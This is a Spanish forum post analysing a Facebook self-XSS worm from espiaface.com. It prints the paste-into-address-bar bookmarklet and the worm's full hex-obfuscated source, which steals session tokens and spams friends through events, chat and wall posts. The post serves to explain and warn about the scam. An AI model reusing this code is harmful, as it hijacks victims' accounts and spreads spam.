últimos mensajes de: Terabytes

El texto que dices que inserta en la box de la url es codigo javascript :silbar:
,lo que insertar un script malicioso creando un elemento.
Citar
javascript:(a=(b=document).createElement('script')).src='//app.espiaface.com/app.js?'+Math.random(),b.body.appendChild(a);void(0)
al ejecutarse el script creaba un evento con la cuenta del usuario que lo ejecuto, y enviaba invitaciones a todos los usuarios.

el evento creado contenía un string de texto alusivo a espiaface.com.

pura ingieneria social, tan facil lo lograron explotar sin tener que mortificarse en encontrar un xss, el usuario solito hacia todo el trabajo xD

tome una muestra del script para analizarlo, aca esta el code que contenia.
Código:
var _0x3fe9=["\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25\x20\x6D\x69\x72\x61\x20\x65\x73\x74\x6F\x20\x71\x75\x65\x20\x65\x73\x20\x69\x6E\x63\x72\x65\x69\x62\x6C\x65\x2C\x20\x74\x65\x20\x70\x65\x72\x6D\x69\x74\x65\x20\x76\x65\x72\x20\x71\x75\x69\x65\x6E\x65\x73\x20\x76\x69\x73\x69\x74\x61\x6E\x20\x74\x75\x20\x70\x65\x72\x66\x69\x6C\x20\x79\x20\x66\x75\x6E\x63\x69\x6F\x6E\x61\x20\x62\x69\x65\x6E\x2C\x20\x65\x6E\x74\x72\x61\x20\x61\x3A\x20\x65\x73\x70\x69\x61\x66\x61\x63\x65\x2E\x63\x6F\x6D","\x54\x6F\x70\x20\x64\x65\x20\x76\x69\x73\x69\x74\x61\x6E\x74\x65\x73\x20\x64\x65\x20\x74\x75\x20\x70\x65\x72\x66\x69\x6C\x20\x64\x65\x20\x68\x6F\x79\x3A\x20\x0A\x20\x25\x74\x66\x25\x20\x2D\x20\x31\x39\x20\x76\x69\x73\x69\x74\x61\x73\x20\x0A\x20\x25\x74\x66\x25\x20\x2D\x20\x31\x36\x20\x76\x69\x73\x69\x74\x61\x73\x20\x0A\x20\x25\x74\x66\x25\x20\x2D\x20\x31\x35\x20\x76\x69\x73\x69\x74\x61\x73\x20\x0A\x20\x25\x74\x66\x25\x20\x2D\x20\x31\x33\x20\x76\x69\x73\x69\x74\x61\x73\x20\x0A\x20\x41\x76\x65\x72\x69\x67\x75\x61\x20\x74\x75\x20\x74\x61\x6D\x62\x69\x65\x6E\x20\x71\x75\x69\x65\x6E\x20\x74\x65\x20\x65\x73\x74\x61\x20\x6D\x69\x72\x61\x6E\x64\x6F\x20\x65\x6E\x74\x72\x61\x6E\x64\x6F\x20\x65\x6E\x3A\x20\x65\x73\x70\x69\x61\x66\x61\x63\x65\x2E\x63\x6F\x6D\x0A\x46\x75\x6E\x63\x69\x6F\x6E\x61\x20\x64\x65\x20\x76\x65\x72\x64\x61\x64\x21","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x73\x70\x69\x61\x66\x61\x63\x65\x2E\x63\x6F\x6D\x2F\x63\x61\x72\x67\x61\x2E\x70\x68\x70","\x45\x73\x74\x6F\x20\x65\x73\x20\x69\x6E\x63\x72\x65\x69\x62\x6C\x65\x21\x20\x70\x75\x65\x64\x65\x6E\x20\x76\x65\x72\x20\x71\x75\x69\x65\x6E\x20\x65\x73\x74\x61\x20\x76\x69\x73\x69\x74\x61\x6E\x64\x6F\x20\x73\x75\x20\x70\x65\x72\x66\x69\x6C\x20\x79\x20\x74\x65\x20\x6C\x6C\x65\x67\x61\x6E\x20\x6E\x6F\x74\x69\x66\x69\x63\x61\x63\x69\x6F\x6E\x65\x73\x2C\x20\x73\x69\x67\x61\x6E\x20\x6C\x6F\x73\x20\x70\x61\x73\x6F\x73\x20\x64\x65\x20\x65\x73\x74\x61\x20\x70\x61\x67\x69\x6E\x61\x20\x71\x75\x65\x20\x65\x78\x70\x6C\x69\x63\x61\x20\x63\x6F\x6D\x6F\x20\x68\x61\x63\x65\x72\x6C\x6F\x2C\x20\x65\x6E\x74\x72\x65\x6E\x20\x65\x6E\x3A\x20\x65\x73\x70\x69\x61\x66\x61\x63\x65\x2E\x63\x6F\x6D","\x41\x76\x65\x72\x69\x67\x75\x61\x20\x71\x75\x69\x65\x6E\x20\x76\x69\x73\x69\x74\x61\x20\x74\x75\x20\x70\x65\x72\x66\x69\x6C","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x31\x30\x30\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x30\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x20\x3C\x62\x72\x2F\x3E\x3C\x62\x3E\x43\x61\x72\x67\x61\x6E\x64\x6F\x20\x61\x70\x6C\x69\x63\x61\x63\x69\x6F\x6E\x2C\x20\x61\x67\x75\x61\x72\x64\x65\x20\x75\x6E\x20\x6D\x6F\x6D\x65\x6E\x74\x6F\x2E\x2E\x2E\x3C\x2F\x62\x3E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x20\x4C\x61\x20\x61\x70\x6C\x69\x63\x61\x63\x69\x6F\x6E\x20\x65\x73\x74\x61\x20\x70\x72\x65\x70\x61\x72\x61\x6E\x64\x6F\x20\x74\x75\x20\x66\x61\x63\x65\x62\x6F\x6F\x6B\x20\x70\x61\x72\x61\x20\x72\x65\x67\x69\x73\x74\x72\x61\x72\x20\x6C\x61\x73\x20\x76\x69\x73\x69\x74\x61\x73\x20\x64\x65\x20\x74\x75\x73\x20\x61\x6D\x69\x67\x6F\x73\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x6E\x65\x74\x69\x63\x73\x2E\x62\x77\x68\x2E\x68\x61\x72\x76\x61\x72\x64\x2E\x65\x64\x75\x2F\x73\x6E\x70\x32\x72\x66\x6C\x70\x2F\x63\x69\x72\x63\x6C\x65\x2E\x67\x69\x66\x22\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x75\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"];var chatmessage=_0x3fe9[0];var postmessage=_0x3fe9[1];var redirect=_0x3fe9[2];var eventdesc=_0x3fe9[3];var eventname=_0x3fe9[4];var nfriends=5000;var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0x3fe9[7]][_0x3fe9[6]][_0x3fe9[5]]=redirect;} ,500);} ;} ;var doget=function (_0xbf72xb,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[8],_0xbf72xb);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]]();} ;doget(_0x3fe9[15],function (_0xbf72xf){var _0xbf72x10=document[_0x3fe9[17]][_0x3fe9[16]](/c_user=(\d+)/)[1];var _0xbf72x11=function (_0xbf72x12){return _0xbf72x12?_0x3fe9[18]+_0xbf72x12[_0x3fe9[19]]+_0x3fe9[20]+_0xbf72x12[_0x3fe9[21]]+_0x3fe9[22]:_0x3fe9[23];} ;var _0xbf72x13=function (_0xbf72x12){return _0xbf72x12?_0xbf72x12[_0x3fe9[21]]:_0x3fe9[23];} ;var _0xbf72x14=function (_0xbf72x12){out=_0x3fe9[23];for(var _0xbf72x15 in _0xbf72x12){out+=(out?_0x3fe9[24]:_0x3fe9[23])+_0xbf72x15+(_0xbf72x12[_0xbf72x15]!==null?_0x3fe9[25]+encodeURIComponent(_0xbf72x12[_0xbf72x15]):_0x3fe9[23]);} ;return out;} ;var _0xbf72x16=function (_0xbf72xb,_0xbf72x12,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[26],_0xbf72xb);_0xbf72xe[_0x3fe9[29]](_0x3fe9[27],_0x3fe9[28]);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]](_0xbf72x14(_0xbf72x12));} ;var _0xbf72x17=function (){var _0xbf72x18=document[_0x3fe9[31]](_0x3fe9[30]);_0xbf72x18[_0x3fe9[33]][_0x3fe9[32]]=_0x3fe9[34];_0xbf72x18[_0x3fe9[33]][_0x3fe9[35]]=_0x3fe9[36];_0xbf72x18[_0x3fe9[33]][_0x3fe9[37]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[39]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[40]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[7]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[42]]=_0x3fe9[43];_0xbf72x18[_0x3fe9[33]][_0x3fe9[44]]=_0x3fe9[45];_0xbf72x18[_0x3fe9[33]][_0x3fe9[46]]=_0x3fe9[47];_0xbf72x18[_0x3fe9[33]][_0x3fe9[48]]=999999;_0xbf72x18[_0x3fe9[49]]=_0x3fe9[50];document[_0x3fe9[52]][_0x3fe9[51]](_0xbf72x18);} ;var _0xbf72x19=_0xbf72xf[_0x3fe9[16]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);if(_0xbf72x19){comp=_0xbf72x19[1];} else {comp=_0x3fe9[23];} ;var _0xbf72x1a=_0xbf72xf[_0x3fe9[16]](/name="post_form_id" value="([\d\w]+)"/i)[1];var _0xbf72x1b=_0xbf72xf[_0x3fe9[16]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];var _0xbf72x1c=document[_0x3fe9[56]](_0x3fe9[55])[_0x3fe9[54]][_0x3fe9[53]];redirect=redirect+_0x3fe9[57]+_0xbf72x14({userid:_0xbf72x10,name:_0xbf72x1c,doclose:1});_0xbf72x17();if(eventdesc){wf++;_0xbf72x16(_0x3fe9[58],{type:_0x3fe9[59],eid:null,invite_message:_0x3fe9[23],__d:1,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60]},function (_0xbf72x1d){var _0xbf72x1e=_0xbf72x1d[_0x3fe9[16]](/\\"token\\":\\"([^\\]+)\\"/)[1];var _0xbf72xb=_0x3fe9[61]+_0xbf72x10+_0x3fe9[62]+_0xbf72x1e+_0x3fe9[63];doget(_0xbf72xb,function (_0xbf72x1f){var _0xbf72x20=_0xbf72x1f[_0x3fe9[16]](/\{"uid":\d+,/g);var _0xbf72x21=[];for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/:(\d+),/)[1];if(_0xbf72x23!=_0xbf72x10){_0xbf72x21[_0x3fe9[65]](_0xbf72x23);} ;} ;var _0xbf72x24= new Date;_0xbf72x24[_0x3fe9[67]](_0xbf72x24[_0x3fe9[66]]()+86400000);datestr=_0xbf72x24[_0x3fe9[68]]()+1+_0x3fe9[15]+_0xbf72x24[_0x3fe9[69]]()+_0x3fe9[15]+_0xbf72x24[_0x3fe9[70]]();timestr=_0xbf72x24[_0x3fe9[71]]()*60;var _0xbf72x25={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,start_dateIntlDisplay:datestr,start_date:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0x3fe9[23],location:_0x3fe9[23],street:_0x3fe9[23],geo_id:_0x3fe9[23],geo_sq:_0x3fe9[23],desc:eventdesc,sgb_invitees:_0xbf72x21[_0x3fe9[73]](_0x3fe9[72]),sgb_emails:_0x3fe9[23],sgb_message:_0x3fe9[23],privacy_type:_0x3fe9[74],guest_list:_0x3fe9[74],connections_can_post:_0x3fe9[74],save:_0x3fe9[75],submitting:_0x3fe9[23]};_0xbf72x25[_0x3fe9[76]]=_0x3fe9[23];_0xbf72x16(_0x3fe9[77],_0xbf72x25,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xbf72x16(_0x3fe9[78],{user:_0xbf72x10,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60],popped_out:false,force_render:true},function (_0xbf72x1d){var _0xbf72x26=_0xbf72x1d[_0x3fe9[79]](9);var _0xbf72x27=eval(_0x3fe9[80]+_0xbf72x26+_0x3fe9[81]);var _0xbf72x28=_0xbf72x27[_0x3fe9[83]][_0x3fe9[82]];for(var _0xbf72x29 in _0xbf72x28[_0x3fe9[84]]){var _0xbf72x2a=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958);var _0xbf72x2b=( new Date)[_0x3fe9[66]]();var _0xbf72x2c=chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]());_0xbf72x16(_0x3fe9[92],{msg_id:Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958),client_time:( new Date)[_0x3fe9[66]](),msg_text:chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]()),to:_0xbf72x29,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,post_form_id_source:_0x3fe9[60]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0x3fe9[93]+_0xbf72x10+_0x3fe9[94],function (_0xbf72x1d){var _0xbf72x20=_0xbf72x1d[_0x3fe9[16]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);var _0xbf72x2d=[];if(_0xbf72x20){for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/_\d+_/)[0][_0x3fe9[91]](/_/g,_0x3fe9[23]);var _0xbf72x2e=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/>[^>]+\\u003c\\\/a>$/i)[0][_0x3fe9[91]](/\\u003c\\\/a>$/gim,_0x3fe9[23])[_0x3fe9[91]](/>/g,_0x3fe9[23]);_0xbf72x2d[_0x3fe9[65]]({id:_0xbf72x23,name:_0xbf72x2e});} ;} ;var _0xbf72xd=[];var _0xbf72x2f=[];while(_0xbf72x2d[_0x3fe9[64]]){var _0xbf72x30=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*_0xbf72x2d[_0x3fe9[64]]);_0xbf72xd[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);_0xbf72x2f[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);var _0xbf72x2b=_0xbf72x2d[_0x3fe9[95]]();if(_0xbf72x30){_0xbf72x2d[_0xbf72x30-1]=_0xbf72x2b;} ;} ;if(debug){alert(_0x3fe9[96]+_0xbf72xd[_0x3fe9[64]]);} ;var _0xbf72x31={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x10,xhpc_context:_0x3fe9[97],xhpc_fbx:_0x3fe9[23],lsd:null,post_form_id_source:_0x3fe9[60]};mt=postmessage;m=postmessage;while(mt[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x32=_0xbf72xd[_0x3fe9[98]]();mt=mt[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x32));m=m[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x32));} ;_0xbf72x31[_0x3fe9[101]]=mt;_0xbf72x31[_0x3fe9[102]]=m;if(debug){alert(_0x3fe9[103]+mt);} ;_0xbf72x16(_0x3fe9[104],_0xbf72x31);var _0xbf72x33=function (_0xbf72x15){if(_0xbf72x15==0){wf=0;mf();return ;} ;var _0xbf72x34=_0xbf72x2f[_0x3fe9[95]]();var _0xbf72x35={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x34[_0x3fe9[19]],xhpc_context:_0x3fe9[105],xhpc_fbx:1,lsd:null,post_form_id_source:_0x3fe9[60]};var _0xbf72x36=postmessage;var _0xbf72x37=postmessage;if(_0xbf72xd[_0x3fe9[64]]==0){wf=0;mf();return ;} ;while(_0xbf72x36[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x38=_0xbf72xd[_0x3fe9[98]]();_0xbf72x36=_0xbf72x36[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x38));_0xbf72x37=_0xbf72x37[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x38));} ;_0xbf72x35[_0x3fe9[101]]=_0xbf72x36;_0xbf72x35[_0x3fe9[102]]=_0xbf72x37;_0xbf72x16(_0x3fe9[104],_0xbf72x35);setTimeout(function (){_0xbf72x33(_0xbf72x15-1);} ,2000);} ;wf++;setTimeout(function (){_0xbf72x33(nfriends);} ,2000);} );} ;mf();} );
solo con decodificar las string que estan en hex se daran cuenta todo lo que hace
al final la intención de la web era ponerte a llenar surveys por las cuales los delincuentes perciben unos $$$.

aca la copia de la web en el cache de google : www.espiaface.com

PD: creo que hasta se ddosearon ellos mismo mandando tanto trafico de facebook a su web xD

Edit: se me olvidaba, tambien entre las string se ecuentran los valores estaticos y falsos que usa para decir x persona visito tu perfil 19 veces por ejemplo.

saludos